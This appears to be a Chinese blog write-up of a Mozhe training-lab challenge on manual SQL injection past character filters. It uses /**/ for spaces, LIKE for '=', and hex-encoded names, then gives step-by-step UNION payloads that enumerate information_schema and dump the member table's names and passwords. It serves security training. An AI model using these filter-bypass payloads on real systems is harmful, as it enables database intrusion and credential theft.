墨者SQL过滤字符后手工注入漏洞测试(第1题)

思路:注入嘛,那就是该试的都试试,然后你会发现单引号页面跳转了虽然没有和之前一样有sql报错什么的,而且空格order,by ,select什么的字符都被过滤

那么就是要用url编码的方式去绕过滤,值得注意的是空格用/**/代替,=用like代替

简单说就是和正常注入的不同的地方就是每一步注入的代码都要换成url编码的形式再去注入,然后就和正常注入没什么区别了

ps:这里其实一开始我也没什么思路的QAQ,然后就无脑sqlmap了,后面会发现sqlmap抛出来的账号密码都不行,所以还是得手注可恶

总结:字符过滤,编码绕过

登入点开注入页面什么的就不截图了

直接上开始构造注入语句

/**/order/**/by/**/4页面正常

/**/order/**/by/**/5页面又错了,说明列还是4

然后就看显示点,这里要主要把id=1 改成2或者-1啥都的都行,反正别让正常页面出来就行

/**/union/**/select/**/1,2,3,4

 然后就找数据库和版本咯

/**/union/**/select/**/1,database(),version(),4

 然后就是找表咯,这里要先把数据库名换成ASCLL格式,前面加个0x然后再拿去url加密,为什么呢,大概就是0xASCLL格式才能被数据库读懂,然后呢就是再一起去url编码

 /**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x6d6f7a68655f64697363757a5f73746f726d67726f7570

 

 找完表就是找字段

和前面一样要把表换成ASCLL然后前面加0x

 /**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x73746f726d67726f75705f6d656d626572

 然后就是找数据咯

/**/union/**/select/**/1,group_concat(name,password),3,4/**/from/**/stormgroup_member

 md5

 用admin/470117登入成功拿到key

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

唯熟唯尔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值